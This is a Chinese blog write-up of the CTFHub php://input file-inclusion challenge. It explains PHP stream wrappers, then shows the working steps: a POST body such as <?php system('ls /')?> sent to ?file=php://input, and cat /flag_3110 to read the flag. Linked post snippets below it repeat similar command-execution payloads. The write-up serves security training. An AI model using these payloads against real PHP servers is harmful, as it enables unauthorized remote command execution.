CTFHUB-技能树-Web题-RCE(远程代码执行)-文件包含-php://input

最新推荐文章于 2025-10-11 22:16:50 发布
原创 最新推荐文章于 2025-10-11 22:16:50 发布 · 905 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #开发语言

CTFHUB-技能树-Web题-RCE(远程代码执行)-文件包含-php://input

文章目录

前置知识—php伪协议
php支持的伪协议
1 file:// — 访问本地文件系统
2 http:// — 访问 HTTP(s) 网址
3 ftp:// — 访问 FTP(s) URLs
4 php:// — 访问各个输入/输出流(I/O streams)
5 zlib:// — 压缩流
6 data:// — 数据(RFC 2397)
7 glob:// — 查找匹配的文件路径模式
8 phar:// — PHP 归档
9 ssh2:// — Secure Shell 2
10 rar:// — RAR
11 ogg:// — 音频流
12 expect:// — 处理交互式的流

php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。

php伪协议详解

php伪协议总结

文件包含—php://input

做题前先了解substr函数

函数语法:

substr(string,start,length)

参数介绍:

  • string 必需。规定要返回其中一部分的字符串。
  • start 必需。规定在字符串的何处开始。

正数 - 在字符串的指定位置开始

负数 - 在从字符串结尾的指定位置开始

0 - 在字符串中的第一个字符处开始

  • length 可选。规定要返回的字符串长度。默认是直到字符串的结尾。

正数 - 从 start 参数所在的位置返回

负数 - 从字符串末端返回

解题方法:

观察代码

在这里插入图片描述

代码中说如果file 名中六个字符是 “php://” 就执行后面的include函数

这里其实就应该想到的是php://伪协议

php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。

而执行php://input伪协议条件是allow_url_include是On

查看phpinfo发现时allow_url_include是On

url?file=php://phpinfo

在这里插入图片描述

在这里插入图片描述

说明可以使用php://input伪协议

那么我们就开始做题

用brup抓包,放入重放器中

直接构造

file的值为php://input
也就是 ?file=php://input

post参数为

<?php system("ls")?>

因为php://input是执行后面的PHP命令所以要写成php代码形式

在这里插入图片描述

直接访问根目录

(也可以一级一级目录找 
<?php system("ls ../")?>
<?php system("ls ../../")?>
)

,寻找flag

<?php system("ls /")?>

在这里插入图片描述

查看flag

system("cat /flag_3110")?>

在这里插入图片描述

ctfhub-RCE-文件包含 ,php://input,远程包含​,​ 读取源代码, 命令注入,过滤cat,过滤空格,过滤目录分隔符,过滤运算符,综合过滤练习
weixin_55702959的博客
02-02 4367
目录 文件包含 php://input php://input伪协议 远程包含 ​​ 读取源代码 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符 综合过滤练习 文件包含 打开目发现代码中有shell.txt直接点击shell打开在post发现是没用的,于是换个方式在?file=shell.txt 进行post php://input php:// 输入输出流 PHP 提供了一些杂项输入/输出(IO)流,允许访问...
CTFHUB-web-RCE-php://input
weixin_68416970的博客
08-08 440
修改 GET 请求为 POST 请求,使用参数 就可以查看到目标站点中的文件,其中 system 是目标系统,括号中的内容执行命令。网页显示源代码,判断如果参数以 php:// 开头,那么执行 include 函数将参数值作为文件包含进来。在根目录发现了名字带有 flag 的文件,使用cat 命令查看这个文件发现了 flag。使用 file 查看 php://input, 感觉这个网页可能存在文件包含漏洞。刷新页面抓个包,拼接一个之后发包,响应成功。
CTFHub-RCE中的PHP://input思路
最新发布
y07xiao的博客
10-11 375
php://inputPHP提供的一个伪协议,允许开发者访问 POST 请求的原始内容,它是一个只读流,可以直接读取原始的 POST 数据,而不需要依赖特定的全局变量。响应了空白说明还没有php参数,如果报错了则是服务器可能不支持PHP://input。这样就找到了flag,再次构造一个PHP(使用cat查看flag)用到的工具有burpsuite,火狐浏览器。现在来构造一个php包,直接去找根目录。点击Forward发送,靶机会显示。首先检查确认一下漏洞和配置。这样就找到了flag。
ctfhub——php://input
At0m的博客
01-14 7883
首先这道 有一些知识需要了解。参考 《php伪协议实现命令执行的七种姿势》《php伪协议总结》 首先看一下代码,截取字符串前六个字符需要 与 php://相等,也就是file变量的值 的前六个字符需要与 php://相等。 所以写个应该是要用到php伪协议。 有一个例子看一下 php伪协议该怎么用。 16年华山杯,源码如下: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($u
substr(php函数)
zunguitiancheng的专栏
03-31 582
http://baike.baidu.com/subview/1827482/5080396.htm                1.定义和用法              2.语法 3.参数 1.定义和用法编辑 substr() 函数返回字符串的一部分。 如果 start 参数是负数且 length 小于或等于 start,则 length 为 0。 2.语法编辑
php 去掉字符串的最后一个字符
蔡先生的专栏
10-10 6796
原字符串1,2,3,4,5,6, 去掉最后一个字符",",最终结果为1,2,3,4,5,6  代码如下:  $str = "1,2,3,4,5,6,"; $newstr = substr($str,0,strlen($str)-1); echo $newstr; //echo 1,2,3,4,5,6 系统自带的函数即可实现这样的效果,两种方法:  sub
ctfhub--ctf--web--RCE(1.eval执行2.文件包含3.常见伪协议用法4.php://input5.远程包含6.读取源代)
feiniaotjx的博客
10-05 731
RCE1.eval执行2.文件包含3.php://input 1.eval执行 request接受post和get请求,接受cmd参数 使用远程系统命令遍历目录 查看文件 2.文件包含 需要传一个file参数,不能为flag,存在shell.txt,可连接shell,故可以访问?file=shell.txt 之后post提交ctfhub=system('cat /flag');查看flag 3.php://input ...
CTFHUB--RCE--文件包含
qq_75120258的博客
03-02 1230
有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。当它与包含函数结合时,php://filter经常会被当作代码呗执行,所以我们通常会对他进行BASE64编码。file=php://filter/resource=/flag 得到flag。php:// — 访问各个输入/输出流(I/O streams)data://text/plain 任意代码执行。zlib:// — 压缩流。
解记录-CTFHub技能树|Web|RCE
weixin_57448435的博客
09-15 1309
RCE漏洞,Hackbar插件的使用,cmd命令,运算符、空格、关键字flag、cat。
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7974
Web 目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHUB-技能树-Web-RCE远程代码执行-文件包含php://input—读取源代码
Static______的博客
06-28 541
而且也没有木马文件可以用,但是它说flag在 /flag当中。而它说flag在 /flag当中那么我们直接。file的前六个字母要是php://
php字符串删除最后一位,php如何删除字符串最后一个字符
weixin_39572972的博客
03-10 258
php删除字符串最后一个字符的方法:1、使用rtrim函数删除字符串末端的空白字符;2、通过substr函数返回字符串的子串,并实现删除最后一个字符即可。PHP删除字符串最后一个字符通常在存多个有效值的时候(如:关键字,标签等),需要对存储的值进行分隔符处理,这样处理后通常会在字符串的首端或末端多一个分隔符,这是就需要对字符串进行处理删除首端或末端的分隔符。方法一:rtrim — 删除字符串末端的...
php去掉字符串的最后一个字符substr()
万里船的专栏
03-24 879
去掉字符串中的最后一个字符  原字符串1,2,3,4,5,6,  去掉最后一个字符",",最终结果为1,2,3,4,5,6  代码如下:  复制代码 代码如下: $str = "1,2,3,4,5,6,";  $newstr = substr($str,0,strlen($str)-1); echo $newstr;  系统自带的函数也可实现这样的效果,两种方法:
php去掉字符串的最后一个字符
分享干货,拒绝水文
01-10 411
在一个站长的空间看到这样的文章,觉得会有用,先记录下来原字符串1,2,3,4,5,6, 去掉最后一个字符",",最终结果为1,2,3,4,5,6 代码如下: $str = "1,2,3,4,5,6,"; $newstr = substr($str,0,strlen($str)-1); echo $newstr; //echo 1,2,3,4,5,6系统自带的函数即可实现这样的效果,两种方法: su
CTFHub技能树web(持续更新)--RCE--文件包含--php://input
jiuyongpinyin的博客
01-25 1202
php://input 做了两道才知道自己对于文件包含这里完全没有什么思路,所以还是参考了大神的链接 大神链接:点我看大神链接 这道打开的目页: 代码的意思是检验在url的get传参中有没有file这个参数,如果有,从第0位开始,长度必须为6的参数值必须是php://(不知道我这么说,说的清不清楚),符合条件就传入,不符合就返回Hacker。 所以参考了大神链接后,get传入参数flie=php://input: [外链图片转存中…(img-z6pUNpjh-1611544235748)] yo
php函数去除最后一个字符,PHP如何去除字符串中的最后一个字符?
weixin_42546508的博客
04-14 394
PHP如何去除字符串中的最后一个字符?这篇文章为大家讲解的是PHP如何去掉字符串的最后一个字符的多种方法,感兴趣的同学参考下。下面来一起看看。假设一个字符串,最后有一个逗号字符","去掉,有四种方法, 直接看代码://PHP去除字符串中的最后一个字符$str = "aaaa,bbb,ccc,ddd,eee,";echo rtrim($str,','); //第一种方法 trim($str,$chs...
CTFHub | php://input
尼泊罗河伯的博客
06-08 2346
简单分析网页显示内容中的源代码,判断如果参数以 php:// 开头,那么执行 include 函数将参数值作为文件包含进来。否则,输出字符串 Hacker!!! 。
php 去掉最后一个字符
一只想成为斗战圣佛的小猴子
05-07 1007
去掉最后一个字符
CTFhub-RCE-php://input
ssss39的博客
11-13 601
1. 使用Burpsuite抓包并转至Repeater。我们需要使用php://input来构造发送的指令。证明是可以使用php://input。3. 使用cat访问flag_xxx。查看phpinfo,找到一下字段。
CTFHUB----web前置技能-rce
01-01
### CTFHUB Web 前置技能 RCE 挑战及解思路 #### 远程命令执行简介 远程命令执行(Remote Command Execution, RCE),是指攻击者能够通过应用程序接口发送特定指令,在服务器端执行任意操作系统级别的命令。这种漏洞一旦被利用,可能导致整个系统的完全控制。 #### 发现潜在的RCE漏洞 当面对可能存在RCE漏洞的应用程序时,通常会寻找可以输入数据的地方,比如表单提交、URL参数等位置。如果这些地方的数据未经严格验证就直接用于构建并执行系统调用,则可能成为RCE攻击的目标[^1]。 #### 验证是否存在RCE漏洞 为了确认是否真的存在这样的安全风险,可以通过尝试注入一些简单的测试语句来观察响应情况。例如,在支持PHP环境的情况下,可以试着向目标页面传递如下payload: ```php <?php phpinfo(); ?> ``` 如果上述代码被执行并且返回了PHP配置信息,则说明确实存在未受保护的入口点允许外部传入的内容影响到内部逻辑处理流程。 #### 利用已知条件构造有效载荷 假设经过初步探测之后发现了某个变量可以直接参与到shell_exec()函数之中去,那么就可以精心设计一段能实现预期目的同时又不会引起怀疑的日志记录脚本作为最终的有效负载。这里给出一个简单例子用来获取当前目录下的文件列表: ```bash ls -al ``` 当然实际操作过程中还需要考虑更多因素,如编码方式转换、特殊字符转义等问以确保成功绕过防护机制达到想要的效果。 #### 安全建议 对于开发者而言,预防此类问的发生至关重要。应当遵循最小权限原则分配资源访问权;对所有来自客户端的信息都应做充分校验过滤后再参与后续运算过程;定期审查源码查找安全隐患及时修复补丁版本更新至最新状态等等措施均有助于减少遭受恶意侵害的可能性。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

python炒粉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值